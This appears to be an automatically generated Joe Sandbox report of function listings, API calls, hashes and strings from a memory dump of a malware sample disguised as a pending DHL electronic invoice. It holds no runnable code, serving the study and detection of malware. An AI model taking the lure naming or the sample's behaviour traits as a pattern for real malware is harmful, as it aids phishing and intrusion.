Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: AllocateExitHeapProcess
String ID: &EA
API String ID: 1054155344-1330915590
Opcode ID: 74718f39f73767e11d61d1e7c1d9dd5e3dec8e3c8a46534d5e077441bd196523
Instruction ID: 3442741909fd3ae836a7a9b636d4f3a5158cea82ca9ee53051834243c9db8715
Opcode Fuzzy Hash: 74718f39f73767e11d61d1e7c1d9dd5e3dec8e3c8a46534d5e077441bd196523
Instruction Fuzzy Hash: B4119DB5204248AFCB14EFA8DC80DEB77A8AF88314F15864DF95C97242C634E916CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D

Strings

&EA, xrefs: 0041A642, 0041A64C

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4

Uniqueness

Uniqueness Score: -1.00%

Function 0040830A Relevance: 1.6, APIs: 1, Instructions: 62
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c9fa9b717a73b89cfc8cb1096402c616e658baaf3a741ba5bf89e6e5482e68be
Instruction ID: 824987672ed01c09ee9b66fcdf58cf4c3352d779d31f09e622c7ebf533d05529
Opcode Fuzzy Hash: c9fa9b717a73b89cfc8cb1096402c616e658baaf3a741ba5bf89e6e5482e68be
Instruction Fuzzy Hash: 6B014931A8031876E720A6A59C03FFE775CAB40B54F05026EFF04FA1C1EAA9690542EA

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7B1 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 3dd8dddf95c5932f6aa1323c090e32eb977d90218e8a7b8369b87a08571e4ed2
Instruction ID: 01149328ab3043017a633e6cc8b1acc7fa4ac83b83ee51ed52c87f83440faf0c
Opcode Fuzzy Hash: 3dd8dddf95c5932f6aa1323c090e32eb977d90218e8a7b8369b87a08571e4ed2
Instruction Fuzzy Hash: DFF0E5B4604240AFC710DF54C845DD73BA8EF80314F00456EFC695B242C735D415CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5

Uniqueness

Uniqueness Score: -1.00%

Function 01982C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982C24

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 027d32178a0435ad0977e20b44132e86b8b26ddd25450598ed125531e22185e0
Instruction ID: 5b0f52081c4d4733fb751602980a9f034584b4b957fee93a443d428cd56d2348
Opcode Fuzzy Hash: 027d32178a0435ad0977e20b44132e86b8b26ddd25450598ed125531e22185e0
Instruction Fuzzy Hash: 6AB09B71D025C5C5DF11F764460C717794477D1701F15C065D2074645F473DC1D1E275

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 019C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

@, xrefs: 019C2B74
DisableExceptionChainValidation, xrefs: 019C275F
TracingFlags, xrefs: 019C2549
LdrpInitializeExecutionOptions, xrefs: 019C317D
minkernel\ntdll\ldrinit.c, xrefs: 019C3187
RaiseExceptionOnPossibleDeadlock, xrefs: 019C2579
MaxLoaderThreads, xrefs: 019C24EC
DisableHeapLookaside, xrefs: 019C246D
Initializing the application verifier package failed with status 0x%08lx, xrefs: 019C3176
GlobalFlag, xrefs: 019C2F3F, 019C3059
UnloadEventTraceDepth, xrefs: 019C24C0
@, xrefs: 019C2942
ShutdownFlags, xrefs: 019C24A1
FrontEndHeapDebugOptions, xrefs: 019C2489
CFGOptions, xrefs: 019C2967
GlobalFlag2, xrefs: 019C2FC0
MinimumStackCommitInBytes, xrefs: 019C2BB0
ExecuteOptions, xrefs: 019C25A0
UseImpersonatedDeviceMap, xrefs: 019C251C
MaxDeadActivationContexts, xrefs: 019C2D82

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: cd3730a9dedb308a7feed1020f2b3b8ffec4669f255f8c5db433e2d51fcfda24
Instruction ID: 8cb89c777717e6a5040f1703828ca19638e8baefdbdddfe89c32c5496ecd0276
Opcode Fuzzy Hash: cd3730a9dedb308a7feed1020f2b3b8ffec4669f255f8c5db433e2d51fcfda24
Instruction Fuzzy Hash: A2924B71608342AFE721DF29C880B6BB7E8BB84B54F14492DFA98D7251D770E944CB93

Uniqueness

Uniqueness Score: -1.00%

Function 01978620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Critical section debug info address, xrefs: 019B541F, 019B552E
Thread identifier, xrefs: 019B553A
undeleted critical section in freed memory, xrefs: 019B542B
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B54E2
Address of the debug info found in the active list., xrefs: 019B54AE, 019B54FA
8, xrefs: 019B52E3
Critical section address., xrefs: 019B5502
Thread is in a state in which it cannot own a critical section, xrefs: 019B5543
Critical section address, xrefs: 019B5425, 019B54BC, 019B5534
Invalid debug info address of this critical section, xrefs: 019B54B6
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B54CE
double initialized or corrupted critical section, xrefs: 019B5508
corrupted critical section, xrefs: 019B54C2
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B540A, 019B5496, 019B5519

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 29b9a771af36ff33b00e2f5e763928a648a4693497738b802508e7196d6b38b4
Instruction ID: f59bd7c4582975ed92c72bade9d7d67511cee92293280a04c94f0ab80f5adafa
Opcode Fuzzy Hash: 29b9a771af36ff33b00e2f5e763928a648a4693497738b802508e7196d6b38b4
Instruction Fuzzy Hash: D0817AB0A01358AFEB20CF99C985FAEBBF9BB88B15F114159F50CB7250D3B5A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 019729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 019B2624
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 019B2412
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 019B2409
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019B24C0
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 019B2498
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019B22E4
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 019B2506
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 019B2602
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019B25EB
RtlpResolveAssemblyStorageMapEntry, xrefs: 019B261F
@, xrefs: 019B259B

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 7050ef8442b7dd724dd0fe2527fe9cf9e9ee87e488ad3364b8a2367cc5bd6726
Instruction ID: 92f2236fbbb79d4d360f87147869a8be30c8f08248d345b77801587a391a4517
Opcode Fuzzy Hash: 7050ef8442b7dd724dd0fe2527fe9cf9e9ee87e488ad3364b8a2367cc5bd6726
Instruction Fuzzy Hash: 9E027EB1D002299BDB31DB54CD80BEAB7B8AF54704F0445EAE64DA7241EB70AF84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 019E8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 019E8BD0
heapType, xrefs: 019E8BCB
smss.exe, xrefs: 019E8B8B
svchost.exe, xrefs: 019E8B68
DefaultBrowser_NOPUBLISHERID, xrefs: 019E8D00
services.exe, xrefs: 019E8B96
SegmentHeap, xrefs: 019E8BE9
lsass.exe, xrefs: 019E8BA1
csrss.exe, xrefs: 019E8B80
runtimebroker.exe, xrefs: 019E8B73

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: ec7417fccb309d1ad2d6256e0175612ee4fe1c35c70e1537c7814972c4f9c92c
Instruction ID: 6c1dc1d0e688de99cc78344f240f185c9e5bd499b7457d469b8c89b5c485de08
Opcode Fuzzy Hash: ec7417fccb309d1ad2d6256e0175612ee4fe1c35c70e1537c7814972c4f9c92c
Instruction Fuzzy Hash: 5851BF715043069BD32ADF98C888BABBBECEFD5640F14492DA95D83245E770D684CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

RtlReAllocateHeap, xrefs: 019F02BF, 019F0362
HEAP[%wZ]: , xrefs: 019F0399, 019F04A8, 019F05D0, 019F0675, 019F06CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 019F06EA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 019F04D3
About to reallocate block at %p to %Ix bytes, xrefs: 019F03BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 019F069F
HEAP: , xrefs: 019F03A6, 019F04B5, 019F05DD, 019F0682, 019F06D9
Just reallocated block at %p to %Ix bytes, xrefs: 019F05F1

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 1d0e617ef22ee361c4d5e0069fd73ea59491d78a7c97cc2de88c0ccc88ce2c55
Instruction ID: 0fe8e6b005704623f7d012b434b726cd1e2e6fbb7d69ac49b652b8f93b5e2c41
Opcode Fuzzy Hash: 1d0e617ef22ee361c4d5e0069fd73ea59491d78a7c97cc2de88c0ccc88ce2c55
Instruction Fuzzy Hash: D0D1EF35600685EFDB22DF69C801AA9BBFAFF89715F09804DF64D9B252D734D981CB10

Uniqueness

Uniqueness Score: -1.00%

Function 019C89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: -*- final list of providers -*- , xrefs: 019C8B8F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 019C8A67
VerifierDlls, xrefs: 019C8CBD
VerifierDebug, xrefs: 019C8CA5
VerifierFlags, xrefs: 019C8C50
HandleTraces, xrefs: 019C8C8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 019C8A3D

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 60817963478844a02cf1958375b65d7aca264e620c676542a10c9d4262d140db
Instruction ID: 1ec64fba8b2e8d9dc439b784c4aa52c8413a683a6499b28523f2c81c5aee6f50
Opcode Fuzzy Hash: 60817963478844a02cf1958375b65d7aca264e620c676542a10c9d4262d140db
Instruction Fuzzy Hash: 2E91F2B1A41716AFD721DF6CD880F5A7BA8ABD4F14F05082CFA8D6B244C770AD01CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0194EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

{, xrefs: 019A4643
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0194EB6C
, xrefs: 0194F299
R, xrefs: 0194EB62
T, xrefs: 0194EB4E
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0194EB58

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: a42fb4fd5549614875b4e252be6bbe3c2217ff86f09e9a3d4aec93651bf5ac38
Instruction ID: e7d02a75a9758377cdd10d633e5d3dc2fdef89ba3d85b210050c293e44af518f
Opcode Fuzzy Hash: a42fb4fd5549614875b4e252be6bbe3c2217ff86f09e9a3d4aec93651bf5ac38
Instruction Fuzzy Hash: 26A26870E0562A8FDB64CF18CC88BA9BBB5BF89705F5442E9D90DA7250DB749E84CF40

Uniqueness

Uniqueness Score: -1.00%

Function 019763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 019B41FE
Delaying execution failed with status 0x%08lx, xrefs: 019B4258
_LdrpInitialize, xrefs: 019B40DF, 019B4141, 019B4205, 019B425F
Process initialization failed with status 0x%08lx, xrefs: 019B413A
minkernel\ntdll\ldrinit.c, xrefs: 019B40E9, 019B414B, 019B420F, 019B4269
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 019B40D8

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 87dca22ece9a59b2550f97d14bb9d6919d73a53b859edcade862ffc72fda43ed
Instruction ID: 8a194ece3d4de41b333b8f4e2f7a5b87996a2832fea06b3a84af365a9bb0e240
Opcode Fuzzy Hash: 87dca22ece9a59b2550f97d14bb9d6919d73a53b859edcade862ffc72fda43ed
Instruction Fuzzy Hash: E8913730F04715EBFB25DF58DD84BEA7BA9BF91B24F000129E50D6B286D7749802D791

Uniqueness

Uniqueness Score: -1.00%

Function 0193645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019999ED
LdrpInitShimEngine, xrefs: 019999F4, 01999A07, 01999A30
minkernel\ntdll\ldrinit.c, xrefs: 01999A11, 01999A3A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01999A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01999A2A
apphelp.dll, xrefs: 01936496

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 40ddb6323570b1a19bf29670b30dad7a7b2d0c8426e48e8661686da03bd8c6f8
Instruction ID: ab0a350b402af3bb2dc1046fe3a4a588fd06eb77cb8e41e0e754b737fd6f013d
Opcode Fuzzy Hash: 40ddb6323570b1a19bf29670b30dad7a7b2d0c8426e48e8661686da03bd8c6f8
Instruction Fuzzy Hash: 46518071608305ABEB25DF28D841FAB7BE9FFC4648F00091DF58D971A4D634EA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0197C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 019B8181, 019B81F5
LdrpInitializeImportRedirection, xrefs: 019B8177, 019B81EB
minkernel\ntdll\ldrinit.c, xrefs: 0197C6C3
Unable to build import redirection Table, Status = 0x%x, xrefs: 019B81E5
Loading import redirection DLL: '%wZ', xrefs: 019B8170
LdrpInitializeProcess, xrefs: 0197C6C4

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: ea8044003515524cb9647086c0893a19f9d11b1c9f1210a137fda9f8ccd3d640
Instruction ID: ea764fe4f38fe3e067b68167b6160267f75f99d61f8de29df03e62620820e8e4
Opcode Fuzzy Hash: ea8044003515524cb9647086c0893a19f9d11b1c9f1210a137fda9f8ccd3d640
Instruction Fuzzy Hash: 3B31F271644307ABC224EF68DD86E6A77D8FFD4B10F04051CF98CAB295E620ED05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01972674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 019B219F
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019B21BF
SXS: %s() passed the empty activation context, xrefs: 019B2165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 019B2180
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 019B2178
RtlGetAssemblyStorageRoot, xrefs: 019B2160, 019B219A, 019B21BA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 2081ec510071fe228d9571558058928c86d0dcdd046ed9135bd8d0fa0f2ccab4
Instruction ID: 3886ed3491a10ab646e154eb00e9c9a43d99f6cc655cf7a3667b0a3d12fd58f4
Opcode Fuzzy Hash: 2081ec510071fe228d9571558058928c86d0dcdd046ed9135bd8d0fa0f2ccab4
Instruction Fuzzy Hash: 3031E936F402257BF7218B998DC5FAABB79EFA4A50F050059FB0C77245D270AA01C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 0198096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01982DF0: LdrInitializeThunk.NTDLL ref: 01982DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01980BA3
